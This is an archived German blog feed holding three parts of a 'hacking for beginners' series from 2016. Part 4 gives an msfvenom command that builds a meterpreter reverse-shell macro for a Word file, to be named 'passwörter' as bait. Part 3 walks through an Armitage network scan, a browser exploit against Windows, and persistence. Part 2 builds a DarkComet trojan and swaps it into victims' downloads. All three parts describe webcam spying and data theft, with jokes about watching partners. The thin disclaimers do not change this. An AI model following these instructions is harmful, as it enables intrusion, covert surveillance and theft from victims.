Patrick's World - Hacken für Anfänger https://archiv.patricksworld.de/patricksworld.bplaced.net/?q=taxonomy/term/5 de "Hacken" für Anfänger Teil 4 - Microsoft Word https://archiv.patricksworld.de/patricksworld.bplaced.net/?q=node/25 <div class="field field-name-body field-type-text-with-summary field-label-hidden"><div class="field-items"><div class="field-item even" property="content:encoded"><p><img src="/bilder/ma.png" /></p> <p><font size="+1"><strong>Danke Microsoft!</strong></font></p> <p>Wem das Betriebssystem noch nicht unsicher genug ist, der sollte eventuell zusätzlich auf Microsoftoffice setzen.<br /> Denn heute zeige ich euch wie ihr eine schädliches Worddokument erstellen könnt.<br /> Was wir nutzen sind Makros. Vielleicht hat der eine oder andere bereits von Makroviren gehört.<br /> Makros sind grundsätzlich für gewisse Funktionen in einem Worddokument gedacht. Also z.B. um einen<br /> Druckauftrag auszuführen oder diverse Formularfunktionen. Allerdings bringen sie wieder Zahlreiche<br /> Sicherheitslücken mit sich.</p> <p>Heute erstellen wir den Makrocode mit Kali Linux und anschließend unser schadhaftes Worddokument.<br /> Wer neu hier ist, sollte zuerst „Hacken für Anfänger“ Teil 1 und 2 und 3 lesen.</p> <p>=======================================================================<br /><em>An dieser Stelle wieder die Moralpeitsche:</em></p> <p>Wir testen bitte alles nur in unserem Netzwerk. Spionieren keine anderen aus usw.<br /> Ihr kennt das ja aus den anderen Tutorials. Ich denke ich zeige euch einfach noch ein paar unterschiedliche Sicherheitslücken und zum Schluss zeige ich euch, wie ihr euch etwas besser<br /> Schützen könnt.</p> <p>Also. Let's go.</p> <p>=======================================================================</p> <p>Als erstes öffnet ihr ein Terminal und überprüft eure IP-Adresse. Das kennt ihr ja bereits.</p> <p>Also einfach </p> <p><strong>ifconfig</strong> eingeben…</p> <p><br /><br /><br /><br /><img src="/bilder/ma01.png" /><br /><br /><br /><br /><br /> Anschließen gebt ihr folgenden Befehl in die Konsole ein:</p> <p><strong>lsfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.5.50 LPORT=8080 -e x86/shikata_ga_nai -f vba-exe</strong><br /><br /><br /><br /><br /> Die Angriffsarten können dabei in einer Vielzahl variieren. In unserem Fall baut der Opfer PC eine Verbindung (reverse_tcp) zu uns auf über den Port 8080. Grundsätzlich könnte man aber auch alle anderen möglichen Befehle einbauen. Also die Festplatte verschlüsseln oder Dateien herunterladen<br /> oder was auch immer. Da könnt ihr selbst kreativ sein. Für Heute soll uns diese Variante genügen. Außerdem wollen wir ja keinen wirklichen Schaden anrichten.<br /><br /><br /><br /></p> <p>Wenn alles funktioniert hat, bekommt ihr bald folgende Ausgabe:<br /><br /><br /><br /><br /><img src="/bilder/ma04.png" /></p> <p><br /><br /><br /><br /> Scrollt einfach in der Konsole hoch und kopiert die Makrobefehle/Mmakrodata in eine Textdatei.<br /> Zusätzlich noch den kompletten Text unter PAYLOAD DATA<br /><br /><br /><br /><br /><img src="/bilder/ma05.png" /><br /><br /><br /><br /><br /> In der Textdatei sieht das dann folgender Maßen aus:</p> <p><img src="/bilder/ma06.png" /><br /><br /><br /><br /><br /> Kopiert die Textdatei auf einen USB Stick oder was auch immer. Denn jetzt brauchen wir einen Windows PC mit Office 2013.<br /> In meinem Falle ein ist es ein Win10 PC. Dort öffnet ihr ein leeres Worddokument und sucht (bei mir rechts oben) das Makrofeld.<br /> Legt einen willkürlichen Namen fest (bei mir ist es test) und klickt auf erstellen. </p> <p><img src="/bilder/ma07.png" /><br /><br /><br /><br /><br /> Dort löscht ihr die paar Zeilen die bereits drin stehen raus und kopiert jetzt unsere vorher erstellten Makrobefehle komplett rein.</p> <p><img src="/bilder/ma08.png" /><br /><br /><br /><br /><br /> Speichert das ganze ab und könnte bereits jetzt schon die neu erstellten Funktionen erkennen.</p> <p><img src="/bilder/ma09.png" /><br /><br /><br /><br /><br /> Anschließend könnt ihr das Makrofenster schließen.<br /> Jetzt haben wir noch die PAYLOAD DATA / Makrodata.<br /><br /><br /><br /><br /> Einfach ein weiteres mal aus unser vorher erstellten Datei den Text kopieren und als normalen Text reinkopieren.</p> <p><img src="/bilder/ma10.png" /><br /><br /><br /><br /><br /> Das wars schon. Jetzt braucht ihr das ganze nur noch abspeichern. Am besten ihr gebt der Datei noch einen schönen Namen,<br /> damit unser Opfer auch etwas motiviert wird, das Ding zu Öffnen. Ich hab es einfach unter dem Namen „passwörter“ abgespeichert.</p> <p><img src="/bilder/ma11.png" /><br /><br /><br /><br /><br /> In meinem Fall gab es eine Warnung bei dem Speichern der Datei. Deshalb musste ich zum Speichern den Virenscanner ausschalten. Macht aber auch nichts.<br /> Denn wir sind ja grundsätzlich die Angreifer. Wie das Worddokument dann seinen Weg zum Opfer findet ist wieder jedem selber überlassen. ZB. Über das<br /> Downloadaustauschen wie bereits bei Teil 1 gezeigt oder per Mail oder einfach auf einem USB-Stick. Oder ihr gebt die Datei in einem Netzwerk frei und wartet,<br /> bis ein „Schlauer“ Vorbeikommt und eure Datei öffnet. Grundsätzlich könnte man das Ganze auch etwas eleganter verstecken etc. Hier soll es aber nur um die<br /> doch recht einfache Möglichkeit gehen, solche Worddokumente zu erstellen.<br /><br /><br /><br /><br /> Also ab zum Test...</p> <p>Auf dem Angreifer PC, also unser Kalilinux müssen wir noch Bescheid geben, wo das Programm auf unsere Opfer warten soll. In unserem Falle der Port 8080.</p> <p>Also einfach </p> <p><strong>Armitage → Listeners → Reverse (wait for) </strong></p> <p>und bei der Abfrage den <strong> Port 8080</strong> angeben.</p> <p><img src="/bilder/ma12.png" /><br /><br /><br /><br /><br /> Der Listener sollte damit starten.<br /><br /><br /><br /></p> <p>Anschließend müsst ihr nur einmal die Worddatei auf dem OpferPC doppelklicken. </p> <p><img src="/bilder/ma16.png" /></p> <p><br /><br /><br /></p> <p>Und das wars dann schon.</p> <p><img src="/bilder/ma13.png" /><br /><img src="/bilder/ma14.png" /><br /><br /><br /><br /></p> <p>Den Rest spare ich mir an dieser Stelle, da ich das schon beim letzten Mal gezeigt hatte.<br /> Ihr habt auf jeden Fall wieder alle Möglichkeiten. Also Daten kopieren, verschlüsseln, löschen, Passwörter auslesen, Keylogger, Webcamshots, Screenshots…<br /><br /><br /><br /><br /> Mit der kostenlosen alternative Libreoffice oder Openoffice wäre das übrigens nicht passiert ;)</p> <p><img src="/bilder/ma15.png" /><br /><br /><br /><br /><br /> Danke nochmal an Microsoft. Mit Windows 10 können wir uns endlich sicher fühlen.<br /> Und das Offeice 365 Home kostet nur 10€ pro Monat. Also schlagt zu, wer weiß ob das immer für 120€ zu haben ist ;)<br /><br /><br /><br /><br /> Hurra….</p> <p>Macht kein Misst Kinder!</p> <p>MFG Patrick</p> </div></div></div><div class="field field-name-field-tags field-type-taxonomy-term-reference field-label-above"><div class="field-label">Tags:&nbsp;</div><div class="field-items"><div class="field-item even" rel="dc:subject"><a href="/?q=taxonomy/term/5" typeof="skos:Concept" property="rdfs:label skos:prefLabel" datatype="">Hacken für Anfänger</a></div></div></div> Mon, 08 Feb 2016 13:47:49 +0000 Patrick 25 at https://archiv.patricksworld.de/patricksworld.bplaced.net https://archiv.patricksworld.de/patricksworld.bplaced.net/?q=node/25#comments "Hacken" für Anfänger Teil 3 - Goodbye WinXP https://archiv.patricksworld.de/patricksworld.bplaced.net/?q=node/24 <div class="field field-name-field-image field-type-image field-label-hidden"><div class="field-items"><div class="field-item even" rel="og:image rdfs:seeAlso" resource="https://archiv.patricksworld.de/patricksworld.bplaced.net/files/styles/large/public/field/image/armitage.png?itok=YiqiWAKf"><img typeof="foaf:Image" src="https://archiv.patricksworld.de/patricksworld.bplaced.net/files/styles/large/public/field/image/armitage.png?itok=YiqiWAKf" width="480" height="234" alt="" /></div></div></div><div class="field field-name-body field-type-text-with-summary field-label-hidden"><div class="field-items"><div class="field-item even" property="content:encoded"><p><font size="+2"><strong><strong>Hallo liebe Windows Freunde,</strong></strong></font></p> <p>heute beschäftigten wir uns mit <strong><font size="+1">Exploits.</font></strong> </p> <p>Was sind<strong><font size="+1"> Exploits</font></strong>? Ganz einfach. Es sind Sicherheitslücken, die beim Programmieren nicht<br /> berücksichtigt wurden. Und genau die nutzen viele Hacker aus. Bevorzugt dabei natürlich unter<br /> Windows, grundsätzlich existieren die aber für alle Betriebssysteme. Also z.B. auch unter Android<br /> oder IOS.<br /><br /><br /> Opensource? Den Begriff dürften die meisten von euch bereits einmal gehört haben und wird häufig mit Freeware verwechselt.<br /> Was bedeutet das?<br /> Opensource wird häufig als kostenlos verstanden, was es auch meistens ist. Allerdings ist es durchaus möglich,<br /> das man auch dafür Geld bezahlen muss. Opensource bedeutet nur das der Quelltext (also der Programmtext) für jedermann<br /> einsehbar und lesbar ist.<br /><br /><br /> Freeware dagegen ist kostenlos, allerdings sieht man da häufig nicht den Programmcode.</p> <p>Was hat das mit dem heutigen Thema zu tun? Ganz einfach. Unter Linux und anderer Opensourcesoftware,<br /> kann man den Quelltext einsehen und somit auch sehen, was das Programm im Hintergrund eigentlich macht<br /> und ob es vielleicht schlampig programmiert ist und somit eventuelle Schwachstellen erkennen. </p> <p>Microsoft &amp; Co. Behalten natürlich ihren Programmcode für sich und verschleiern ihn zusätzlich, damit möglichst<br /> niemand den Code einsehen kann. Das Problem dabei. Man erkennt nicht ohne weiteres Sicherheitslücken.<br /> Wenn einer glaubt das wäre gut, der irrt. Denn sobald ein Hacker eine Schwachstelle findet ist Feierabend.<br /> Unter anderen Umständen hätte eventuell ein WhiteHacker bereits vorher die Lücke entdeckt und geschlossen.<br /><br /><br /><br /><br /><font size="+1"><strong>So viel zur Theorie…</strong></font></p> <p>Doch jetzt wollen wir bekannte Sicherheitslücken nutzen. Ich hoffe euch wird am ende klar, warum<br /> man immer alle Programme aktuell halten sollte.</p> <p>Die heutige Sicherheitslücke ist insofern der Knaller, da sie von WinXP bis Win10 bestand.<br /> Auch wenn diese für fast alle geschlossen wurde, so gibt es immer noch genügend Windows XP-Rechner und<br /> auch genügend die ihr System nicht immer aktualisieren. Denn wie bereits das letzte Mal schon erwähnt,<br /> wurde diese Sicherheitslücke <strong><font size="+1">nicht mehr für XP geschlossen und existiert bis heute</font></strong>.<br /><br /><br /><br /><br /> Die folge davon ist, das nur ein XP-Rechner auf unsere Webseite kommen muss oder wir leiten ihn gezielt im Netzwerk um.<br /> Wie das geht, weißt ihr ja bereits.<br /><br /><br /><br /><br /> Für unseren heutigen Test benutzen wir Kalilinux. Eine Linuxdistribution, die extra für Pentesting (Penetrationtesting)<br /> zusammengestellt wurde. Mit dem kann man so ziemlich alles machen, was sich das Hackerherz (oder Skriptkiddieherz)<br /> nur wünschen kann. Und da das Motto „Hacken für Anfänger“ erhalten bleiben soll, geht das wieder ganz einfach mit einer<br /> grafischen Oberfläche ohne große Konsolenkenntnisse.<br /><br /><br /><br /><br /> Als erstes müsst ihr euch Kalilinux <a href="https://www.kali.org/">hier</a> herunterladen:<br /><a href="https://www.kali.org/">https://www.kali.org/</a><br /><br /><br /><br /><br /> Danach könnt ihr das einfach auf einen Usb-stick installieren und vom USB-Stick starten. Wenn jemand das nicht hin<br /> bekommen sollte, dann gebt mir einfach Bescheid, dann zeige ich euch, wie ihr euer kleines virtuelles Netzwerk aufbauen<br /> könnt und euch einen USB-Stick erstellen könnt.<br /><br /><br /><br /><br /> ======================================================================================================</p> <p>Und wie immer die Moralpeitsche. An dieser Stelle weise ich ausdrücklich darauf hin, das ihr die Angriffe verstehen<br /> sollt um euch davor zu schützen. Wenn ihr das selber austestet, macht das<br /> bitte nur im eigenen Netzwerk an euren TestPCs. Denn wie es schon bei Spider-Man heißt:</p> <p><strong><font size="+1">„Aus großer Macht folgt große Verantwortung“</font></strong></p> <p>Also. Baut bitte keinen Misst mit dem neuen Wissen. Datendiebstahl &amp; Co sind kein Kavaliersdelikt!!</p> <p>Und jetzt los.<strong> Let's go.</strong></p> <p>======================================================================================================<br /><br /><br /><br /></p> <p>Wir benutzen heute <strong>Metasploit und Armitage</strong>. Metasploit ist einfach eine riesige Sammlung von Exploits und Armitage ist<br /> eine grafische Oberfläche, damit es auch wirklich jedes Kind beherrschen kann. </p> <p>Als erstes öffnen wir wieder eine Konsole und schauen kurz nach unserer eigenen IP-Adresse.<br /> Das macht ihr wie gewohnt mit dem Befehl<br /><br /><br /><br /><br /><em>ifconfig</em></p> <p><img src="bilder/kl1.png" /><br /><br /><br /><br /><br /> Die merkt ihr euch oder lasst das Fenster einfach geöffnet.</p> <p><br /><br /><br /><br /> Im Anschluss drückt ihr auf das schrullige Mädchen am linken Rand.<br /> Dadurch wird Armitage gestartet. Eventuelle Fragen einfach mit Ja weiter klicken.<br /> Ihr könnt die Voreinstellungen also so lassen wie sie sind.<br /><br /><br /><br /><br /><img src="bilder/kl2.png" /></p> <p><br /><br /><br /><br /> Im Anschluss öffnet ihr oben im Menü <strong><em>Hosts → Nmap Scan → Ping Scan</em></strong>. Grundsätzlich funktionieren auch alle anderen Methoden.<br /> Aber in meinem Falle geht der einfach super schnell.<br /><br /><br /><br /><img src="bilder/kl03.png" /><br /><br /><br /><br /> Da wir vorher die IP-Adresse bereits untersucht hatten (in meinem Falle 192.168.5.41) tauscht ihr die letzte Zahl<br /> durch eine 0/24. Das bedeutet das ihr das gesamte Netzwerk durchsucht.<br /><br /><br /><br /><br /><img src="bilder/kl04.png" /><br /><br /><br /><br /><br /> Wenn ihr euer Netzwerk nach Opfern durchsucht habt, sollten auch die PCs angezeigt werden.</p> <p>Wie <br /><br /><br />ihr seht ist die Anzahl von Möglichen Exploits gigantisch. Wir beschränken uns aber heute auf den Exploit<br /> der immer noch für WinXP und die nicht aktualisieren anderen WinPCs existiert.<br /><br /><br /><br /><br /> Jetzt geht ihr links auf <strong><em>Exploits → windows → browser → ms14_064_ole_execution</em></strong>.<br /><br /><br /><br /><br /><img src="bilder/kl05.png" /><br /><br /><br /><br /></p> <p>Ihr werdet beim nächsten Fenster nach weiteren Einstellungen gefragt. Das einzige was ihr <strong><em>ändern müsst ist das Feld LHOST</em></strong>.<br /> In meinem Falle<br /><br /><br /><br /><br /> statt 10.0.2.15 die 192.168.5.41. Also eure IP die wir zum Anfang ermittelt haben.</p> <p><img src="bilder/kl06.png" /><br /><br /><br /><br /></p> <p>Nachher bekommt ihr die IP-Adresse von unserem soeben erstellten Schadwareserver. Grundsätzlich könnte das jede Webseite sein.<br /> Ich könnte das also auch in Patricksworld etc. im Hintergrund laufen lassen. Und glaubt mir. So seriöse Pornoseiten haben<br /> so etwas ohne Ende im Hintergrund laufen. Heute geht’s ja nur um die Demonstration. Ihr könntet das Opfer mit unseren<br /> alten Methoden natürlich im eigenen Netzwerk auch einfach auf die „Website“ umleiten.<br /><br /><br /><br /><br /> Egal. In meinem Falle ist es auf jedenfall die Adresse <a href="https://192.168.5.41:8080/omg">https://192.168.5.41:8080/omg</a><br /> Sobald das Opfer warum auch immer diese Seite ansteuert ist es vorbei. Wie ihr unschwer erkennen könnt hab ich mein Opfer<br /> bereits auf die Seite geleitet und wir bekommen direkt die Rückmeldung in unserem Programm.<br /><br /><br /><br /><br /><strong>--&gt; Meterpreter session 1 opened</strong><br /><br /><br /><br /><br /><img src="bilder/kl07.png" /><br /><br /><br /><br /></p> <p>Wir haben bereits jetzt die volle Kontrolle über den PC.<br /> Allerdings funktioniert der Angriff nur so lange wie das Opfer den Browser offen hat. Das heißt wir wollen natürlich<br /><strong>dauerhaft den PC übernehmen</strong>. Profis würden das natürlich automatisieren. Doch da wir nur Anfänger sind, müssen wir das<br /> per Hand machen.<br /><br /><br /><br /><br /> Einfach rechte <strong><em>Maustaste → Meterpreter → Acces → Persist</em></strong><br /><br /><br /><br /><br /><img src="bilder/kl08.png" /></p> <p><br /><br /><br /><br /> Und das war es schon. Sobald das Opfer den PC neu startet sind wir wieder automatisch auf dem Opfer PC aufgeschaltet.</p> <p>Wir haben jetzt also die Zeit der Welt uns auszutoben.</p> <p> Also Daten kopieren, hoch und runter laden. Webcam übernehmen. Die Prozesse anzeigen lassen. Halt alles was ihr wollt.<br /><br /><br /><br /><br /> Hier noch ein Paar Bilder:</p> <p> <img src="bilder/kl09.png" /><br /><br /><br /><br /><br /> Dateibrowser:<br /><img src="bilder/kl10.png" /><br /><br /><br /><br /><br /> Bildschirmscreenshot:<br /><img src="bilder/kl11.png" /><br /><br /><br /><br /><br /> Prozesse anzeigen und steuern.<br /><img src="bilder/kl12.png" /></p> <p> <br /><br /><br /><br /> Nur abschließend. Genau diese Lücke bestand schon seit Jahren bei allen Windows-Versionen.<br /> Hurra. Danke Microsoft.<br /> Also. Falls es wirklich noch WinXP Benutzer unter euch gibt. Bitte Installiert euch ein sicheres Betriebssystem.<br /> Windows ist in Puncto Sicherheit schlimm genug. Aber WinXP ist in der heutigen Zeit einfach nur verboten.<br /> Vielleicht denkt der eine oder andere doch einmal über einen Betriebssystemwechsel nach.</p> <p>MFG Patrick</p> </div></div></div><div class="field field-name-field-tags field-type-taxonomy-term-reference field-label-above"><div class="field-label">Tags:&nbsp;</div><div class="field-items"><div class="field-item even" rel="dc:subject"><a href="/?q=taxonomy/term/5" typeof="skos:Concept" property="rdfs:label skos:prefLabel" datatype="">Hacken für Anfänger</a></div></div></div> Sun, 07 Feb 2016 11:25:51 +0000 Patrick 24 at https://archiv.patricksworld.de/patricksworld.bplaced.net https://archiv.patricksworld.de/patricksworld.bplaced.net/?q=node/24#comments "Hacken" für Anfänger Teil 2 - Das Trojanische Pferd https://archiv.patricksworld.de/patricksworld.bplaced.net/?q=node/23 <div class="field field-name-field-image field-type-image field-label-hidden"><div class="field-items"><div class="field-item even" rel="og:image rdfs:seeAlso" resource="https://archiv.patricksworld.de/patricksworld.bplaced.net/files/styles/large/public/field/image/pferd.png?itok=SXRZrD7I"><img typeof="foaf:Image" src="https://archiv.patricksworld.de/patricksworld.bplaced.net/files/styles/large/public/field/image/pferd.png?itok=SXRZrD7I" width="322" height="480" alt="" /></div></div></div><div class="field field-name-body field-type-text-with-summary field-label-hidden"><div class="field-items"><div class="field-item even" property="content:encoded"><p>Hallo liebe Hobby Hacker und Skript-kiddies.<br /><br /><br /><br /> Heute geht es weiter mit Teil 2 unserer Serie <b>„Hacken“ für Anfänger</b>.<br /><br /><br /><br /> Vorab. Wer nicht den Teil eins gelesen hat, sollte damit jetzt anfangen.<br /> Dort haben wir nur ganz grob ein paar Grundlagen geschaffen und<br /> auch erklärt, warum ich hier ganz grob die Methoden versuche für den<br /> PC-Anfänger zu erklären.<br /><br /><br /><br /> Heute geht es darum unseren eigenen kleinen Trojaner zu erstellen.<br /><br /><br /><br /> Ich denke die meisten von euch wissen bereits was das sein soll. Für den<br /> Rest ganz kurz. Ich muss dazu kurz Stromberg zitieren, der sich da auch<br /> mit Solchen Themen sehr intensiv befasst.<br /><br /><br /><br /><br /><i>...<br /> Der ... kann Kaffee, Döner, Bauchtanz<br /> Mehr nicht. Das ist kein Vorurteil, sondern historisch erwiesen.<br /> Die alten Griechen, die haben historisch was geleistet, aber der ..., da wird es eng<br /> ...</i><br /><br /><br /><br /></p> <p>Warum? Weil ein Trojanisches Pferd in der  griechischen Mythologie  ein Holzpferd war,<br /> wo die alten Griechen die kleinsten Soldaten reingesteckt haben,<br /> welche dann nach Troja einkehren konnten und die Türen und Tore öffneten.<br /> Dannach haben sie noch ordentlich einen Getrunken, sich über die Trojanischen Frauen herrgemacht<br /> und die Burg besetzt.<br /><br /><br /><br /></p> <p><span style="font-size: larger;"><strong>Das Trojanische Pferd von Heute.</strong></span></p> <p><br /><br /><br /></p> <p>Ihr seht. Die Masche ist alt, aber dennoch in der heutigen Zeit beliebt.<br /> Denn genau das gleiche machen wir heute. Wir erstellen ein Programm,<br /> tarnen es und wenn es einmal auf dem System ausgeführt wird, können wir uns ein Bier aufmachen,<br /> Fotos ansehen und mit etwas Glück bekommen wir noch eine Webcam liveshow. Zugegeben.<br /> In Troja war das wahrscheinlich etwas spannender. Aber was solls. Lieber Cybersex als gar kein Sex.<br /> Man nimmt, was man bekommt ;)<br /><br /><br /><br /><br /><span style="font-size: larger;"><strong>WIR SIND DIE GUTEN!!</strong></span><br /><br /><br /></p> <p>An dieser Stelle noch ganz kurz die Moralpeitsche. Wir wollen hier Angriffe lernen und verstehen,<br /> damit wir uns zum Schluss schützen können. Also bitte benehmt euch und testet das nur an dem<br /><b>EIGENEN PC im EIGENEM Netzwerk</b>. Alles andere ist strafbar und sau unnötig. Außerdem sollte<br /> wirklich jeder Virenscanner unsere Datei erkennen. Wenn das bei jemand nicht der Fall ist,<br /> sollte man definitv das Virenprogramm wechseln!<br /> Vorab. Wir müssen für unseren kleinen Versuch den Virenscanner abschalten.<br /> Aber. Wenn setzt euch noch ein zusätzliches Testsystem auf.<br /> Führt den Trojaner auf keinen Fall auf eurem PC aus. Auch wenn der relativ harmlos ist und<br /> nur verbindung zu eurem PC aufnimmt, so setzt sich das Ding ordentlich in euer System fest.<br /> Und es ist umständlich das Ding wieder zu löschen. Dann hilft auch das nachträgliche Wiederanschalten<br /> von eurem Scanner nichts! Das muss man dann manuell alles löschen. Und das ist nerfick. Allerdings ist das Tool,<br /> was ich euch heute dazu vorstelle, wie auch bei dem letzten Mal, von einer IT-Sicherheitsfirma.<br /> Es gibt auch ein entsprechendes Gegentool. Also Finger weg, von PC's die ihr nachher weiter verwenden wollt.<br /> Zum Testen. Ladet euch einfach Virtualbox runter. Das ist kostenlos und gibt es für jedes Betriebssystem.</p> <p><br /><br /><br />Außerdem könnt ihr euch alle Windowsversionen kostenlos schon vorinstalliert bei Microsoft runter laden.<br /> Hier dazu der Link: <a href="https://dev.windows.com/en-us/microsoft-edge/tools/vms/windows/">https://dev.windows.com/en-us/microsoft-edge/tools/vms/windows/</a></p> <p>Einfach die runtergeladene Datei entpacken und und bei Virtualbox auf Importieren drücken.<br /> Bei den Netzwerkeinstellungen in Virtualbox müsst ihr noch auf „Netzwerkbrücke“ umschalten.<br /> Dann könnt ihr auch schon loslegen. Falls ihr dazu auch ein Tuturial wollt,<br /> dann schreibt das hier einfach in die Kommentare.</p> <p><b><span style="font-size: larger;">Jetzt geht’s aber wirklich los.</span></b><br /><br /><br /><br /> Es gibt unendlich viele „Trojaner-Baukästen“, damit auch dem technisch nicht versierten die<br /> Möglichkeit gegeben wird, seine Freundin oder was auch immer aus zu spionieren.<br /> Einer der einfachsten und dazu noch sehr effektiven ist der „Dark-Comet“.<br /> Ladet euch das Tool einfach unter diesem Link: <a href="https://sourceforge.net/projects/darkcomet/">https://sourceforge.net/projects/darkcomet/</a> herrunter.</p> <p>Schaltet den Virenscanner ab. Denn sonst funktioniert das nicht einmal auf dem Angreifer PC.<br /> Der Baukasten richtet aber keine Schäden auf eurem Rechner an. Und es muss ein Windows PC sein.<br /> Bei mir hat es allerdings sogar unter Linux mit WINE funktioniert. Könnte also auch unter Mac OSX funktionieren. </p> <p><b><span style="font-size: larger;"><span style="font-size: larger;">Der Ablauf:</span></span></b></p> <p><b>1.Virenscanner abschalten</b><br /><br /><br /><br /><b>2. Programm starten</b></p> <p><img src="bilder/RAT.png" width="953" height="506" alt="" /><br /><br /><br /><img src="bilder/rt0.png" width="1028" height="608" alt="" /></p> <p><br /><br /><br /><br /><b>3. </b><b>Oben links aufs Menü drücken</b>. <i>Server module -&gt; Full Editor</i><br /><img src="bilder/rt1.png" width="1301" height="744" alt="" /><br /><br /><br /><br /><b>4. Setzt einfach die Haken wie auf den Bildern</b><br /><img src="bilder/rt2.png" width="561" height="423" alt="" /></p> <p>5. Bei der IP-Adresse muss eure <b>IP vom Angreifer-PC </b>rein. Das hatten wir schon das letzte mal<br /> Unter Windows -&gt; Kommandozeile auf: ipconfig eingeben. Unter Linux/Mac OSX ifconfig<br /><img src="bilder/rt3.png" width="961" height="423" alt="" /></p> <p><b><span style="font-size: larger;">6. Der Port</span></b> </p> <p>... ist völlig hupe. Sollte nur nicht gerade 80 oder 443 sein. Oder 21,22. Also nehmt einfach<br /> den gleichen wie ich und gut ist.</p> <p>Da wir ja Grundlagen erlernen wollen. Eurer PC und eure Firewall (häufig der Router) kommuniziert über Ports. Also kleine Türchen. Wenn alle geschlossen sind, gehen also<br /> keine Daten übers Netzwerk rein oder raus. Aber das macht natürlich reichlich wenig Sinn.<br /> Der Port 80 ist z.B. der Standartport für das Internet. Macht also reichlich wenig Sinn diesen zu schließen. In meinem Bild seht ihr das ich für den Angriff den Port 1604 nutze. Das heißt also<br /> unser kleiner Trojaner für Arme öffnet bei dem Opfer den Port 1604 um zu uns eine Verbindung aufzubauen. Es gibt da wieder reichlich viele unterschiedliche Varianten, die den Rahmen unserer kleinen Serie sprengen würde. Wir benutzen eine Reverse connection. Das heißt unser Opfer nimmt<br /> Kontakt zu uns auf. Das hat den Vorteil, das wir so bestehende Firewalls umgehen können, wenn z.B. “alle” eingehenden Blockiert werden.<br /><br /><br /><br /><br /><br /><b>7. Danach wieder weiter fleißig Haken setzen</b>. Ich gehe mal davon aus das die meisten von euch<br /> der Englischen Sprache halb wegs mächtig sind. Dann ist das echt alles selbsterklärend. Die anderen<br /> setzten einfach brav die Haken wie in meinen Bildern.<br /><img src="bilder/rt4.png" alt="" /><br /><img src="bilder/rt5.png" alt="" /><br /><img src="bilder/rt6.png" alt="" /><br /><b>Kleiner Tipp:</b><br /> lasst den Haken bei <i>Persistence installation</i> weg. Denn das bedeutet nur, das unsere<br /> Schaddatei jedes mal zurück kommt. Der Virus an sich ist eh im System integriert, so<br /> das er bei jedem Hochfahren startet. Wenn ihr den Haken weglasst, löscht sich nämlich<br /> die sichtbare Datei selbstständig und das Opfer sieht überhaupt nicht mehr was abgeht.<br /><br /><br /> Ich könnte zwar noch einige Punkte erklären, aber das dauert sonst undendlich lange. Und wir wollen<br /> ja endlich Nacktbilder sehen. Also klickt euch durch bis zu dem Punkt Generate und fertig.<br /><br /><br /><img src="bilder/rt7.png" width="565" height="420" alt="" /><br /><br /><br /><br /><br /> Jetzt haben wir unseren ersten kleinen Trojaner. Ein anderes Mal zeige ich euch, wie man auch<br /> einen Trojaner in jedes “gutartige” Programm einschleusen kann. Das heißt das Euer Opfer<br /> keinen blassen Schimmer hat, das eurer VLC Player sich gerade selbständig macht. Oder noch besser man tarnt das ding im Virenscanner.<br /> Wir testen das einfach das nächste Mal. Wäre schon witzig. Der Virenverseuchte Virenscanner.<br /><br /><br /><br /><br /> 8. Wir müssen unserem Progamm noch sagen, auf welchen Port wir warten.<br /> Einfach obem im Menü <i><b>+Listen to new port</b></i> drücken und den Port den ihr vorher angegeben<br /> habt dort eintragen. In meinem Fall also der 1604.<br /><img src="bilder/rt1.png" /><br /><br /><br /> Und fertig.<br /><br /><br /><br /> So. Jetzt ist natürlich die Frage groß, wie wir das Ding jetzt auf unseren Opfer PC übertragen können. Klar. Man schickt einen link zum Download oder hängt es an eine Email an. Aber da sagt sich jetzt vielleicht die hälfte. So dumm ist niemand. Ja, Ja. Ihr Klugscheißer.<br /><br /><br /><br /> Wir sind auch nicht so 0815 Skriptkiddies. Wenn nur einer von euch beim letzten Mal aufgepasst hätte, wüsste er selber was zu tun ist. Denn ihr müsst schon etwas kreativ sein.<br /> Also. Wir manipulieren einfach unser Netzwerk. Die App vom letzten Mal macht das kinderleicht.<br /> Da gibt es die Option Download abfangen und ersetzen. Das heißt. Unser Opfer bewegt sich ganz normal durchs Netzt. Sieht alle Seiten Original. Die einzige Auffälligkeit ist die Dateigröße. Der Name etc. ist alles das gleiche. Selbst, wenn das Opfer versucht von der Herstellerseite das Ding runter zu laden.<br /> Das heißt. Egal, was für eine Datei geladen wird. Sie wird ersetzt durch unsere. So sieht das ganze dann aus.<br /><img src="bilder/rt8.png" alt="" /></p> <p><br /><br /></p> <p>Jetzt dürft ihr euch euer Belohnungsbier öffnen. Denn ab jetzt wird es witzig.<br /><br /><br /><br /><br /> Sobald euer Opfer zum ersten Mal das Programm gestartet hat, habt ihr vollen Zugriff auf das System.<br /> Wären wir richtige Hacker könnten wir jetzt natürlich über die Konsole webcam aktivieren und daten Hochladen.<br /> Aber wir sind leider nur Skript-Kiddies. Macht aber nix, denn das Programm<br /> bringt alle Funktionen Über eine Menüleiste für uns. Einfach das Opfer aussuchen und los gehts.<br /><br /><br /><br /><img src="bilder/rt9.png" /><br /><br /> Einfach die Webcam aktivieren. Nachrichten schicken. Bilder klauen oder hochladen. Oder nur das Mikro anschalten,<br /> denn das hat ja bekanntlich keine leuchte. Egal. Was ihr wollt. Wer meint es sei ihm egal, ob ihm da<br /> einer zusieht oder was weiß ich. Bedenkt, das der Angreifer auch eure Virenschleuder als Angriffs-PC<br /> nutzen kann.<br /><img src="bilder/rt10.png" /><br /><br /><br /> Naja. Das solls für heute gewesen sein. Wie gesagt. Das ist hier alles super verkürzt dargestellt.<br /> In Wirklichkeit steckt da etwas mehr dahinter. Aber wie ihr sehen könnt, ist es wirklich nicht schwer<br /> mit nur zwei kleinen Programmen. Und wenn man mal davon absieht, das wir das übers Netzwerk gemacht haben.<br /> Es würde natürlich auch die Möglichkeit bestehen, das euch einer sowas Draufknallt, wenn ihr euren<br /> laptop kurz unbeaufsichtigt stehen lasst!<br /><br /><br /><br /></p> <p>Beim nächsten Mal, zeige ich euch, warum es eine wirklich schlechte Idee ist, auf Windows zu setzten.<br /> Und noch schlimmer. Falls irgendjemand noch einen Windowsxp PC besitzt. Macht das Ding platt.<br /> Denn ich zeige beim nächsten Mal eine Sicherheitslücke die für WinXP nicht mehr geschlossen wird.<br /> Das heißt die besteht weiterhin und ab nächste Woche wissen es dann sogar die 10 Blogleser wie man die Kiste hochnimmt.<br /> Allerdings dann endlich mal mit meinem geliebten Linux.<br /><br /><br /><br /> Also. Haut rein. Und macht keinen Quatsch!<br /><br /><br /><br /> MFG 